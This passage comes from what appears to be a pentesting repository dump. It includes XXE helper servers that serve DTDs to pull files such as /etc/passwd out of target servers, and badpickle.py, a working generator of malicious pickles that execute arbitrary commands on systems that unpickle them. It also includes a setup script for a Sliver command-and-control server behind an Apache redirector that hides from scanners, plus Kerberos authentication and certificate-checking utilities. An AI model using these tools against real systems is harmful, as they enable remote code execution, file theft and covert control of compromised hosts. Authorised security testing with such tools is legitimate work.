resultsprovider implementation 147 | httpd.resultsProvider = ResultsProviderImpl(url=baseUrl, counter=baseNo) 148 | 149 | 150 | 151 | print "Serving at: http://%s:%s/" % ('127.0.0.1', str(port)) 152 | httpd.serve_forever() 153 | -------------------------------------------------------------------------------- /helper_servers/xxe_http.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import SimpleHTTPServer 3 | import SocketServer 4 | import sys 5 | import urllib 6 | from optparse import OptionParser 7 | 8 | 9 | # payload will look something like this 10 | # where [ip] and [port] are ones accessible to the remote server where this runs 11 | # /etc/passwd is the remote file to retrieve 12 | ''' 13 | 14 | %xa; %xb; ]> 15 | &external; 16 | ''' 17 | 18 | response_template = '''">''' 19 | 20 | 21 | class ThreadedTCPServer(SocketServer.ThreadingTCPServer): 22 | pass 23 | 24 | 25 | class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): 26 | 27 | 28 | def do_GET(self): 29 | if self.server.debug: 30 | print self.headers 31 | 32 | self.send_response(200) 33 | self.wfile.write('\r\n') 34 | # we parse the request that contains the file contents 35 | if self.server.parseNext: 36 | self.server.parseNext = False 37 | self.wfile.write('Content to return') # this will take the place of the &external; entity 38 | print '\n' + urllib.unquote(self.path.split('a=',1)[-1]) 39 | # we send back the DTD and flick the switch to send back something different on next request 40 | else: 41 | self.wfile.write(response_template.replace('[FN]', self.path).replace('[PROT]','http').replace('[IP]', 42 | self.server.ip).replace('[PORT]', self.server.port) + '\r\n') 43 | self.server.parseNext = True 44 | 45 | 46 | self.wfile.write('\r\n') 47 | self.wfile.flush() 48 | self.wfile.close() 49 | return 50 | 51 | 52 | 53 | if __name__ == '__main__': 54 | parser = OptionParser(usage='%prog [options] ') 55 | parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages') 56 | opts, args = parser.parse_args() 57 | 58 | if len(args) != 2: 59 | parser.print_help() 60 | parser.exit() 61 | try: 62 | ip = args[0] # this is the address that is advertised in the generated DTD 63 | port = int(args[1]) 64 | except ValueError: 65 | parser.print_help() 66 | parser.exit() 67 | 68 | SocketServer.ThreadingTCPServer.allow_reuse_address = True 69 | # bind to everything 70 | httpd = ThreadedTCPServer(("", port), ServerHandler) 71 | httpd.port = str(port) 72 | httpd.ip = ip 73 | httpd.parseNext = False 74 | httpd.debug = opts.debug or False 75 | 76 | print "Serving at: http://%s:%s/" % ('0.0.0.0', str(port)) 77 | httpd.serve_forever() 78 | -------------------------------------------------------------------------------- /helper_servers/xxe_http_ftpfwd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import SimpleHTTPServer 3 | import SocketServer 4 | import sys 5 | import urllib 6 | from optparse import OptionParser 7 | 8 | 9 | # payload will look something like this 10 | # where [ip] and [port] are ones accessible to the remote server where this runs 11 | # /etc/passwd is the remote file to retrieve 12 | ''' 13 | 14 | %xa; %xb; ]> 15 | &external; 16 | ''' 17 | 18 | ''' 19 | 20 | "> %dtd; %xb; ]> 21 | &external; 22 | ''' 23 | 24 | 25 | #response_template = '''">''' 26 | 27 | #response_template = '''">''' 28 | #response_template = '''">''' 29 | #response_template = '''">''' 30 | 31 | 32 | #response_template = '''">''' 33 | 34 | 35 | response_template = '''">">''' 36 | 37 | 38 | 39 | class ThreadedTCPServer(SocketServer.ThreadingTCPServer): 40 | pass 41 | 42 | 43 | class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): 44 | 45 | 46 | def do_GET(self): 47 | if self.server.debug: 48 | print self.headers 49 | 50 | if self.path == '/join.dtd': 51 | self.send_response(200) 52 | self.wfile.write('\r\n') 53 | self.wfile.write('') 54 | self.wfile.write('\r\n') 55 | self.wfile.flush() 56 | self.wfile.close() 57 | return 58 | 59 | self.send_response(200) 60 | self.wfile.write('\r\n') 61 | # we parse the request that contains the file contents 62 | #if self.server.parseNext: 63 | #self.server.parseNext = False 64 | #self.wfile.write('Content to return') # this will take the place of the &external; entity 65 | #print '\n' + urllib.unquote(self.path.split('a=',1)[-1]) 66 | # we send back the DTD and flick the switch to send back something different on next request 67 | #else: 68 | self.wfile.write(response_template.replace('[FN]', self.path).replace('[IP]', 69 | self.server.ip).replace('[PORT]', self.server.ftpport) + '\r\n') 70 | self.server.parseNext = True 71 | 72 | 73 | self.wfile.write('\r\n') 74 | self.wfile.flush() 75 | self.wfile.close() 76 | return 77 | 78 | 79 | 80 | if __name__ == '__main__': 81 | parser = OptionParser(usage='%prog [options] ') 82 | parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages') 83 | opts, args = parser.parse_args() 84 | 85 | if len(args) != 3: 86 | parser.print_help() 87 | parser.exit() 88 | try: 89 | ip = args[0] # this is the address that is advertised in the generated DTD 90 | port = int(args[1]) 91 | ftpport = int(args[2]) 92 | except ValueError: 93 | parser.print_help() 94 | parser.exit() 95 | 96 | SocketServer.ThreadingTCPServer.allow_reuse_address = True 97 | # bind to everything 98 | httpd = ThreadedTCPServer(("", port), ServerHandler) 99 | httpd.port = str(port) 100 | httpd.ftpport = str(ftpport) 101 | httpd.ip = ip 102 | httpd.parseNext = False 103 | httpd.debug = opts.debug or False 104 | 105 | print "Serving at: http://%s:%s/" % ('0.0.0.0', str(port)) 106 | httpd.serve_forever() -------------------------------------------------------------------------------- /payload_creators/badpickle.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Python library/command line tool for creating malicious pickles to attack 4 | # systems that unpickle arbitrary user provided content 5 | 6 | 7 | class BadPickle(): 8 | ''' 9 | Creates malicious pickle strings 10 | 11 | 12 | Usage: 13 | 14 | Different exploit methods are available depending on ptype setting. 15 | 16 | Examples: 17 | 18 | The following runs a command and puts the return code in the pickle output. 19 | 20 | Uses os.system(). Should work fairly universally. 21 | 22 | ----- 23 | > bp = BadPickle('touch /tmp/pwned', ptype='system') 24 | > bpString = bp.sploit() 25 | ----- 26 | 27 | OR 28 | 29 | The following runs a command with the command stdout in the pickle output. 30 | 31 | Uses subprocess.check_output(). Only works on python 2.7+. 32 | Generates CalledProcessError on non zero return code. 33 | 34 | ----- 35 | > bp = BadPickle(['cat', '/etc/passwd'], ptype='check_output') 36 | > bpString = bp.sploit() 37 | ----- 38 | 39 | OR 40 | 41 | The following runs a command with the command stdout in the pickle output. 42 | 43 | Uses subprocess.call(). 44 | 45 | ----- 46 | > bp = BadPickle(['cat', '/etc/passwd'], ptype='subprocess') 47 | > bpString = bp.sploit() 48 | ----- 49 | ''' 50 | 51 | import pickle 52 | 53 | def __init__(self, cmd, ptype='check_output'): 54 | '''Initialise the object. 55 | 56 | ptype is the type of bad pickle to create. 57 | * check_output (default) uses subprocess.check_output. Output is command 58 | stdout. Only works on python 2.7+ 59 | * system uses os.system. Output is command return code. 60 | * subprocess uses subprocess.call. Output is command 61 | return code 62 | 63 | cmd is the command data. It should be: 64 | * A string for ptype 'system'. 65 | * A list of strings for ptype check_output or subprocess 66 | 67 | ''' 68 | self.ptype = ptype 69 | self.c = cmd 70 | if ptype == 'check_output': 71 | if type(self.c) != list: 72 | raise TypeError('Input value must be list') 73 | elif ptype == 'system': 74 | if type(self.c) != str: 75 | raise TypeError('Input value must be string') 76 | elif ptype == 'subprocess': 77 | if type(self.c) != list: 78 | raise TypeError('Input value must be list') 79 | 80 | 81 | def sploit(self): 82 | '''Return the malicious pickled string''' 83 | if self.ptype == 'check_output': 84 | return self.pickle.dumps(self.CheckOutputObject(self.c)) 85 | elif self.ptype == 'subprocess': 86 | return self.pickle.dumps(self.SubprocessCall(self.c)) 87 | elif self.ptype == 'system': 88 | return self.pickle.dumps(self.SystemObject(self.c)) 89 | 90 | 91 | 92 | # outputs stdout of process as pickle output 93 | # this will generate CalledProcessError for processes with non 0 exit status 94 | # only works on python 2.7+ 95 | # instantiate with list of process name and params 96 | class CheckOutputObject(object): 97 | '''Bad pickle object using subprocess.check_output''' 98 | subprocess = __import__('subprocess') 99 | 100 | def __init__(self, c): 101 | self.c = c 102 | 103 | def __reduce__(self): 104 | return (self.subprocess.check_output,(self.c,)) 105 | 106 | 107 | class SubprocessCall(object): 108 | '''Bad pickle object using subprocess.call''' 109 | subprocess = __import__('subprocess') 110 | 111 | def __init__(self, c): 112 | self.c = c 113 | 114 | def __reduce__(self): 115 | return (self.subprocess.call, (self.c,)) 116 | 117 | 118 | # should work fairly universally, but only process exit code provided as output 119 | # instantiate with single string "shell" command 120 | class SystemObject(object): 121 | '''Bad pickle object using os.system''' 122 | os = __import__('os') 123 | 124 | def __init__(self, c): 125 | self.c = c 126 | 127 | def __reduce__(self): 128 | return (self.os.system, (self.c,)) 129 | 130 | 131 | 132 | 133 | 134 | if __name__ == '__main__': 135 | 136 | from optparse import OptionParser 137 | parser = OptionParser(usage='%prog [options] ') 138 | parser.add_option('-r', '--raw', dest='raw', action='store_true', help='no encoding, raw output') 139 | parser.add_option('-x', '--hex', dest='hex', action='store_true', help='encode output using ASCII hex') 140 | parser.add_option('-b', '--base64', dest='base64', action='store_true', help='encode output using Base64 (default)') 141 | parser.add_option('-s', '--system', dest='system', action='store_true', help='use os.system. Command will be a single string.') 142 | parser.add_option('-c', '--checkoutput', dest='checkoutput', action='store_true', help='use subprocess.check_output (default). Command will be a list of command name and params.') 143 | parser.add_option('-p', '--subprocess', dest='subprocess', action='store_true', help='use subprocess.call. Command will be a list of command name and params.') 144 | opts, args = parser.parse_args() 145 | 146 | if len(args) == 0: 147 | parser.print_help() 148 | parser.exit() 149 | else: 150 | if opts.system and (opts.checkoutput or opts.subprocess): 151 | print 'Cannot use multiple exploit methods. Pick one' 152 | parser.exit() 153 | elif opts.system: 154 | d = args[0] 155 | pt = 'system' 156 | elif opts.subprocess: 157 | pt = 'subprocess' 158 | d = args 159 | else: 160 | pt = 'check_output' 161 | d = args 162 | 163 | 164 | if (opts.raw and (opts.base64 or opts.hex)) or (opts.hex and (opts.base64 or opts.raw)): 165 | print 'Multiple encoder options set. Pick one' 166 | parser.exit() 167 | elif opts.raw: 168 | encoder=str 169 | elif opts.hex: 170 | from binascii import hexlify 171 | encoder=hexlify 172 | else: 173 | from base64 import b64encode 174 | encoder=b64encode 175 | 176 | 177 | bp = BadPickle(d, ptype=pt) 178 | print encoder(bp.sploit()) 179 | -------------------------------------------------------------------------------- /presentations/AD_enumeration_with_LDAP_bsides-bonus_detection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stephenbradshaw/pentesting_stuff/82c88be31d22b5b7bbda866aaed2bffb6cdc0ba0/presentations/AD_enumeration_with_LDAP_bsides-bonus_detection.pdf -------------------------------------------------------------------------------- /presentations/ActiveDirectoryLDAPEnumeration_public.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stephenbradshaw/pentesting_stuff/82c88be31d22b5b7bbda866aaed2bffb6cdc0ba0/presentations/ActiveDirectoryLDAPEnumeration_public.pdf -------------------------------------------------------------------------------- /setup_scripts/c2_setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | SLIVER_VERSION=v1.5.43 3 | 4 | apt update 5 | apt upgrade -y 6 | apt install net-tools -y 7 | apt install apache2 -y 8 | apt install php -y 9 | apt install libapache2-mod-php -y 10 | apt install python-is-python3 -y 11 | mkdir -p /opt/sliver 12 | wget https://github.com/BishopFox/sliver/releases/download/$SLIVER_VERSION/sliver-server_linux -O /opt/sliver/sliver-server_linux_$SLIVER_VERSION 13 | wget https://github.com/BishopFox/sliver/releases/download/$SLIVER_VERSION/sliver-client_linux -O /opt/sliver/sliver-client_linux_$SLIVER_VERSION 14 | chmod +x /opt/sliver/sliver-* 15 | rm -f /opt/sliver/sliver-client 16 | rm -f /opt/sliver/sliver-server 17 | ln -s /opt/sliver/sliver-client_linux_$SLIVER_VERSION /opt/sliver/sliver-client 18 | ln -s /opt/sliver/sliver-server_linux_$SLIVER_VERSION /opt/sliver/sliver-server 19 | 20 | echo '127.0.0.1 backend' >> /etc/hosts 21 | 22 | 23 | cat > /etc/apache2/sites-available/forward-http.conf <<'endmsg' 24 | 25 | RewriteEngine On 26 | 27 | 28 | Options FollowSymLinks MultiViews 29 | AllowOverride All 30 | Require all granted 31 | FileETag None 32 | 33 | 34 | ProxyPreserveHost On 35 | 36 | ServerName localhost 37 | DocumentRoot /var/www/html 38 | 39 | ErrorLog ${APACHE_LOG_DIR}/error.log 40 | CustomLog ${APACHE_LOG_DIR}/access.log combined 41 | 42 | 43 | ServerSignature Off 44 | 45 | 46 | endmsg 47 | 48 | a2enmod proxy_http proxy rewrite 49 | a2dissite 000-default 50 | a2ensite forward-http 51 | 52 | systemctl restart apache2 53 | 54 | # create a multiplay user file for local connection 55 | SLIVER_ROOT_DIR=/opt/sliver/ /opt/sliver/sliver-server operator --name admin --lhost 127.0.0.1 --save /opt/sliver/admin_127.0.0.1.cfg 56 | 57 | 58 | cat > /etc/systemd/system/sliver.service <<'endmsg' 59 | [Unit] 60 | Description=Sliver 61 | After=network.target 62 | StartLimitIntervalSec=0 63 | 64 | [Service] 65 | Environment="SLIVER_ROOT_DIR=/opt/sliver" 66 | Type=simple 67 | Restart=on-failure 68 | RestartSec=3 69 | User=root 70 | ExecStart=/opt/sliver/sliver-server daemon 71 | 72 | [Install] 73 | WantedBy=multi-user.target 74 | endmsg 75 | 76 | 77 | systemctl daemon-reload 78 | 79 | systemctl start sliver 80 | systemctl status sliver 81 | 82 | 83 | cat > /var/www/html/index.html <<'endmsg' 84 | 85 | 86 | endmsg 87 | 88 | 89 | 90 | 91 | cat > /var/www/html/robots.txt <<'endmsg' 92 | User-agent: * 93 | Disallow: / 94 | endmsg 95 | 96 | 97 | 98 | cat > /var/www/html/.htaccess <<'endmsg' 99 | RewriteEngine on 100 | 101 | # rewrite / to index.html 102 | RewriteRule ^$ /index.html [L] 103 | 104 | # serve files that exist 105 | RewriteCond /%{REQUEST_FILENAME} -f 106 | RewriteRule .? - [L] 107 | 108 | # Respond to known command line/scanner user agents with 404 109 | RewriteCond %{HTTP_USER_AGENT} curl|wget|masscan|python|zgrab|mobile|censys|hello|okhttp|scans|spider|bot [NC] 110 | RewriteRule .* - [R=404] 111 | 112 | # Send remaining requests to port 8888 on backend host 113 | RewriteRule ^.*$ http://backend:8888%{REQUEST_URI} [P,NE] 114 | endmsg 115 | 116 | 117 | MRANDOM=`tr -dc A-Za-z0-9 /var/www/html/$MRANDOM.php <<'endmsg' 121 | $value) { 126 | echo "$header: $value \n"; 127 | } 128 | 129 | echo "\n\n=APACHE VARIABLES=\n"; 130 | 131 | echo "HTTP HEADERS\n"; 132 | $HTTP_ACCEPT = getenv('HTTP_ACCEPT'); 133 | echo "HTTP_ACCEPT : $HTTP_ACCEPT\n"; 134 | $HTTP_COOKIE = getenv('HTTP_COOKIE'); 135 | echo "HTTP_COOKIE : $HTTP_COOKIE\n"; 136 | $HTTP_FORWARDED = getenv('HTTP_FORWARDED'); 137 | echo "HTTP_FORWARDED : $HTTP_FORWARDED\n"; 138 | $HTTP_HOST = getenv('HTTP_HOST'); 139 | echo "HTTP_HOST : $HTTP_HOST\n"; 140 | $HTTP_PROXY_CONNECTION = getenv('HTTP_PROXY_CONNECTION'); 141 | echo "HTTP_PROXY_CONNECTION : $HTTP_PROXY_CONNECTION\n"; 142 | $HTTP_REFERER = getenv('HTTP_REFERER'); 143 | echo "HTTP_REFERER : $HTTP_REFERER\n"; 144 | $HTTP_USER_AGENT = getenv('HTTP_USER_AGENT'); 145 | echo "HTTP_USER_AGENT : $HTTP_USER_AGENT\n"; 146 | 147 | echo "\n\n=CONNECTION & REQUEST=\n"; 148 | $AUTH_TYPE = getenv('AUTH_TYPE'); 149 | echo "AUTH_TYPE : $AUTH_TYPE\n"; 150 | $CONN_REMOTE_ADDR = getenv('CONN_REMOTE_ADDR'); 151 | echo "CONN_REMOTE_ADDR : $CONN_REMOTE_ADDR\n"; 152 | $CONTEXT_PREFIX = getenv('CONTEXT_PREFIX'); 153 | echo "CONTEXT_PREFIX : $CONTEXT_PREFIX\n"; 154 | $IPV6 = getenv('IPV6'); 155 | echo "IPV6 : $IPV6\n"; 156 | $PATH_INFO = getenv('PATH_INFO'); 157 | echo "PATH_INFO : $PATH_INFO\n"; 158 | $QUERY_STRING = getenv('QUERY_STRING'); 159 | echo "QUERY_STRING : $QUERY_STRING\n"; 160 | $REMOTE_ADDR = getenv('REMOTE_ADDR'); 161 | echo "REMOTE_ADDR : $REMOTE_ADDR\n"; 162 | $REMOTE_HOST = getenv('REMOTE_HOST'); 163 | echo "REMOTE_HOST : $REMOTE_HOST\n"; 164 | $REMOTE_IDENT = getenv('REMOTE_IDENT'); 165 | echo "REMOTE_IDENT : $REMOTE_IDENT\n"; 166 | $REMOTE_PORT = getenv('REMOTE_PORT'); 167 | echo "REMOTE_PORT : $REMOTE_PORT\n"; 168 | $REMOTE_USER = getenv('REMOTE_USER'); 169 | echo "REMOTE_USER : $REMOTE_USER\n"; 170 | $REQUEST_METHOD = getenv('REQUEST_METHOD'); 171 | echo "REQUEST_METHOD : $REQUEST_METHOD\n"; 172 | 173 | 174 | echo "\n\n=SPECIALS=\n"; 175 | $CONN_REMOTE_ADDR = getenv('CONN_REMOTE_ADDR'); 176 | echo "CONN_REMOTE_ADDR : $CONN_REMOTE_ADDR\n"; 177 | $HTTPS = getenv('HTTPS'); 178 | echo "HTTPS : $HTTPS\n"; 179 | $IS_SUBREQ = getenv('IS_SUBREQ'); 180 | echo "IS_SUBREQ : $IS_SUBREQ\n"; 181 | $REMOTE_ADDR = getenv('REMOTE_ADDR'); 182 | echo "REMOTE_ADDR : $REMOTE_ADDR\n"; 183 | $REQUEST_FILENAME = getenv('REQUEST_FILENAME'); 184 | echo "REQUEST_FILENAME : $REQUEST_FILENAME\n"; 185 | $REQUEST_SCHEME = getenv('REQUEST_SCHEME'); 186 | echo "REQUEST_SCHEME : $REQUEST_SCHEME\n"; 187 | $REQUEST_URI = getenv('REQUEST_URI'); 188 | echo "REQUEST_URI : $REQUEST_URI\n"; 189 | $THE_REQUEST = getenv('THE_REQUEST'); 190 | echo "THE_REQUEST : $THE_REQUEST\n"; 191 | 192 | echo "\n\n=DATA=\n"; 193 | try { 194 | echo "Parsed:\n"; 195 | print_r($_POST); 196 | echo "\n"; 197 | } catch (Exception $e) { 198 | 199 | } 200 | try { 201 | echo "Raw (base64 encoded):\n"; 202 | echo base64_encode(file_get_contents('php://input')); 203 | } catch (Exception $e) { 204 | 205 | } 206 | echo "\n\nDone\n\n"; 207 | 208 | ?> 209 | endmsg 210 | 211 | mkdir -p /home/ubuntu/.sliver-client/configs 212 | mv /opt/sliver/admin_127.0.0.1.cfg /home/ubuntu/.sliver-client/configs/ 213 | chown -R ubuntu:ubuntu /home/ubuntu/.sliver-client 214 | 215 | echo "Test script at $MRANDOM.php" 216 | -------------------------------------------------------------------------------- /utilities/basic_kerberos_auth.py: -------------------------------------------------------------------------------- 1 | """Basic implementation of an Impacket Kerberos HTTP Request Authentication module for Python Requests""" 2 | # Modified from https://gist.github.com/dirkjanm/299f5389f83e4053c51f33fb8da42f9c 3 | 4 | import os 5 | import sys 6 | import datetime 7 | import base64 8 | from pyasn1.type.univ import noValue 9 | from pyasn1.codec.der import decoder, encoder 10 | from impacket.spnego import SPNEGO_NegTokenInit, TypesMech 11 | from impacket.spnego import ASN1_OID, asn1encode, ASN1_AID 12 | from impacket.spnego import SPNEGO_NegTokenInit, TypesMech, ASN1_OID, asn1encode, ASN1_AID 13 | from impacket.krb5.gssapi import KRB5_AP_REQ 14 | from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set 15 | from impacket.krb5.types import Principal, KerberosTime, Ticket 16 | from impacket.krb5 import constants 17 | from impacket.krb5.ccache import CCache 18 | from struct import pack 19 | from requests.auth import AuthBase 20 | import logging 21 | from logging import Logger 22 | 23 | 24 | def create_logger(loglevel: str, name: str) -> Logger: 25 | logger = logging.getLogger(name) 26 | logger.setLevel(loglevel) 27 | handler = logging.StreamHandler(sys.stderr) 28 | formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') 29 | handler.setFormatter(formatter) 30 | logger.addHandler(handler) 31 | 32 | return logger 33 | 34 | 35 | 36 | # Kerberos Authenticator for Python requests using ST in ccache format as created per: 37 | # getST.py -spn HTTP/site.example.com -dc-ip 1.2.3.4 EXAMPLE/username 38 | 39 | # Does preemptive authentication (e.g. will not wait for Negotiate 401 response before sending auth header) 40 | 41 | # Use with requests like so 42 | # from basic_kerberos_auth import HTTPBasicKerberosAuth 43 | # kerberos_auth = HTTPBasicKerberosAuth() 44 | # r = requests.get(url, auth=kerberos_auth) 45 | 46 | 47 | 48 | class HTTPBasicKerberosAuth(AuthBase): 49 | """Basic Requests HTTP Kerberos authentication module""" 50 | 51 | def __init__(self, ccache=None, serverPrincipal=None, loglevel=None): 52 | self.ccache_file = ccache if ccache else os.getenv('KRB5CCNAME') 53 | if ccache: 54 | self.ccache = CCache.loadFile(ccache) 55 | else: 56 | if not os.getenv('KRB5CCNAME'): 57 | raise Exception('No credential file specified and no value in KRB5CCNAME environment variable') 58 | self.ccache = CCache.loadFile(os.getenv('KRB5CCNAME')) 59 | 60 | if not loglevel: 61 | loglevel = logging.root.level 62 | 63 | self.logger = create_logger(loglevel, 'HTTPBasicKerberosAuth') 64 | 65 | self.logger.debug('Ccache file: {}'.format(self.ccache_file)) 66 | self.serverPrincipal = serverPrincipal 67 | 68 | 69 | def __call__(self, request): 70 | request.headers['Authorization'] = 'Negotiate {}'.format(base64.b64encode(self.auth(request)).decode()) 71 | return request 72 | 73 | 74 | # Modified from 75 | # https://gist.github.com/dirkjanm/299f5389f83e4053c51f33fb8da42f9c 76 | def auth(self, request): 77 | 78 | get_cred_host = lambda x: x.getServerPrincipal().decode().split('@')[0].split('/')[1] 79 | match = request.url.split('/')[2] 80 | 81 | creds = self.ccache.credentials 82 | if len(creds) < 1: 83 | raise Exception('No credentials in provided ccache file {}'.format(self.ccache_file)) 84 | 85 | self.logger.debug('Ccache file has {} credentials'.format(len(creds))) 86 | 87 | if self.serverPrincipal: 88 | match = self.serverPrincipal 89 | 90 | matching_creds = [a for a in creds if get_cred_host(a) == match] 91 | 92 | if len(matching_creds) < 1: 93 | raise Exception('No credential found in cache matching target host {}'.format(match)) 94 | 95 | matched_cred = matching_creds[0] 96 | credServicePrincipal = matched_cred.getServerPrincipal().decode() 97 | 98 | 99 | endtime = matched_cred.header.fields['time']['endtime'] 100 | 101 | if endtime < datetime.datetime.now(datetime.timezone.utc).timestamp(): 102 | raise Exception('Credential has expired') 103 | 104 | 105 | TGS = matched_cred.toTGS() 106 | tgs1, cipher, sessionKey = TGS['KDC_REP'], TGS['cipher'], TGS['sessionKey'] 107 | 108 | blob = SPNEGO_NegTokenInit() 109 | 110 | # Kerberos v5 mech 111 | blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']] 112 | 113 | # Let's extract the ticket from the TGS 114 | tgs = decoder.decode(tgs1, asn1Spec = TGS_REP())[0] 115 | 116 | domain = str(tgs.getComponentByName('crealm')) 117 | user = [a for a in str(tgs.getComponentByName('cname')).split('\n') if a][-1].strip() 118 | 119 | self.logger.debug('Credential: Server principal:{}; Domain: {}; User: {}; Expiry: {}'.format(credServicePrincipal, domain, user, str(datetime.datetime.fromtimestamp(endtime)))) 120 | 121 | ticket = Ticket() 122 | ticket.from_asn1(tgs['ticket']) 123 | 124 | # Now let's build the AP_REQ 125 | apReq = AP_REQ() 126 | apReq['pvno'] = 5 127 | apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value) 128 | 129 | opts = list() 130 | apReq['ap-options'] = constants.encodeFlags(opts) 131 | seq_set(apReq,'ticket', ticket.to_asn1) 132 | 133 | authenticator = Authenticator() 134 | authenticator['authenticator-vno'] = 5 135 | authenticator['crealm'] = domain 136 | 137 | userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value) 138 | seq_set(authenticator, 'cname', userName.components_to_asn1) 139 | now = datetime.datetime.utcnow() 140 | 141 | authenticator['cusec'] = now.microsecond 142 | authenticator['ctime'] = KerberosTime.to_asn1(now) 143 | 144 | encodedAuthenticator = encoder.encode(authenticator) 145 | 146 | # Key Usage 11 147 | # AP-REQ Authenticator (includes application authenticator 148 | # subkey), encrypted with the application session key 149 | # (Section 5.5.1) 150 | encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None) 151 | 152 | apReq['authenticator'] = noValue 153 | apReq['authenticator']['etype'] = cipher.enctype 154 | apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator 155 | 156 | blob['MechToken'] = pack('B', ASN1_AID) + asn1encode(pack('B', ASN1_OID) + asn1encode( 157 | TypesMech['KRB5 - Kerberos 5']) + KRB5_AP_REQ + encoder.encode(apReq)) 158 | return blob.getData() 159 | -------------------------------------------------------------------------------- /utilities/cert_checker.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/env python3 2 | import socket 3 | from OpenSSL import SSL, crypto 4 | import requests 5 | import OpenSSL 6 | import asn1crypto 7 | import cert_human 8 | 9 | methods = [ 10 | 'SSLv23_METHOD', 11 | 'SSLv2_METHOD', 12 | 'SSLv3_METHOD', 13 | 'TLSv1_1_METHOD', 14 | 'TLSv1_2_METHOD', 15 | 'TLSv1_METHOD'] 16 | 17 | 18 | # openssl s_client -servername -showcerts -connect :443 19 | 20 | class SSLCertChecker(): 21 | 22 | def __init__(self, hostname, port, methods=methods, use_sni=True, cafile=None, force_verify=True, debug=False): 23 | self.hostname = hostname 24 | self.port = int(port) 25 | self.certs = [] 26 | self.methods = methods 27 | self.use_sni = use_sni 28 | self.cafile = cafile 29 | if not self.cafile: 30 | self.cafile = requests.certs.where() #get trusted ca file from requests module if not provided 31 | self.debug = debug 32 | self.force_verify = force_verify 33 | 34 | 35 | 36 | def verify_cb(self, conn, cert, errnum, depth, ok): 37 | '''Provided as an alternate cert verify routine - not currently used''' 38 | self.certs.append(cert) 39 | return 1 # this verifies all certs 40 | 41 | 42 | def guess_root_cert(self, cert): 43 | '''Retrieve probably signing certificate from a trust store based on a match between subject and issuer of provided intermediate cert''' 44 | issuer = self.get_issuer(cert) 45 | return [self.pem_to_x509(a) for a in self.get_trust_store_certs() if self.get_subject(a) == issuer] 46 | 47 | 48 | def pem_to_x509(self, cert): 49 | '''Convert PEM certificate to x509''' 50 | return crypto.load_certificate(crypto.FILETYPE_PEM, cert) 51 | 52 | 53 | def get_trust_store_certs(self): 54 | '''Get list of PEM certs from trust store - assuming newline seperation between PEM certs in file''' 55 | return '\n'.join([a for a in open(self.cafile).read().split('\n') if not a.startswith('#')]).split('\n\n') 56 | 57 | 58 | def get_issuer(self, cert): 59 | '''Get issuer of cert in x509 or PEM form''' 60 | if not isinstance(cert, OpenSSL.crypto.X509): 61 | cert = self.pem_to_x509(cert) 62 | return asn1crypto.x509.Certificate.load(crypto.dump_certificate(crypto.FILETYPE_ASN1, cert)).issuer.human_friendly 63 | 64 | 65 | def get_subject(self, cert): 66 | '''Get subject of cert in x509 or PEM form''' 67 | if not isinstance(cert, OpenSSL.crypto.X509): 68 | cert = self.pem_to_x509(cert) 69 | return asn1crypto.x509.Certificate.load(crypto.dump_certificate(crypto.FILETYPE_ASN1, cert)).subject.human_friendly 70 | 71 | 72 | # this might be overkill but I have seen some suggestions online that a single pass through verify_certificate only does the intermediate chain 73 | def chain_verify(self, root, chain): 74 | '''Does a multi step certificate chain verification at each step for the given context''' 75 | while len(chain) > 1: 76 | if self.verify_chain(root, chain): 77 | if self.debug: 78 | print('Chain verification, context length {}'.format(len(chain))) 79 | chain = chain[1:] 80 | else: 81 | return False 82 | return True 83 | 84 | 85 | def verify_chain(self, root, chain): 86 | '''Verify a certificate chain''' 87 | store = crypto.X509Store() 88 | for cert in chain[1:]: 89 | store.add_cert(cert) 90 | store.add_cert(root) 91 | store_ctx = crypto.X509StoreContext(store, chain[0]) 92 | return False if store_ctx.verify_certificate() else True 93 | 94 | 95 | def get_certs(self): 96 | '''Connect to service and grab the full certificate chain''' 97 | self.certs = [] 98 | for method in self.methods: 99 | # error handling for connection errors 100 | try: 101 | ctx = SSL.Context(getattr(SSL, method)) 102 | 103 | ctx.load_verify_locations(cafile=self.cafile) 104 | #ctx.set_verify(SSL.VERIFY_PEER, self.verify_cb) # alternate method of getting certs, 105 | sock = SSL.Connection(ctx, socket.socket(socket.AF_INET, socket.SOCK_STREAM)) 106 | sock.settimeout(5) 107 | if self.use_sni: 108 | sock.set_tlsext_host_name(self.hostname.encode()) 109 | sock.connect((self.hostname, self.port)) 110 | sock.setblocking(1) 111 | sock.do_handshake() 112 | #sock.send('GET / HTTP/1.1\r\nHost: {}'.format(self.hostname).encode()) #also needed for sni???? 113 | self.certs.append(sock.get_peer_certificate()) 114 | for cert in sock.get_peer_cert_chain(): 115 | if cert.get_serial_number() not in [a.get_serial_number() for a in self.certs]: 116 | self.certs.append(cert) 117 | if self.certs: 118 | if self.debug: 119 | print('Connection successful with method {}'.format(method.replace('_METHOD', ''))) 120 | break 121 | except: 122 | if self.debug: 123 | print('Conenction failure with method: {}'.format(method.replace('_METHOD', ''))) 124 | pass 125 | 126 | if not self.certs: 127 | raise Exception('Could not successfully connect to service and retrieve certificates') 128 | 129 | # get the certs from the trust store that match based on simple string match issuer<->subject 130 | proot = self.guess_root_cert(self.certs[-1]) 131 | root_cert = None 132 | # then run a verification routine against the probable matches to find the correct one 133 | for root in proot: 134 | if self.chain_verify(root, self.certs): 135 | self.certs.append(root) 136 | root_cert = root 137 | 138 | if not root_cert: 139 | if self.debug: 140 | print('Matching verified root certificate not found') 141 | if self.force_verify: 142 | raise Exception('Could not verify chain to trusted root, you can try a different trust store or turn off force_verify to get the 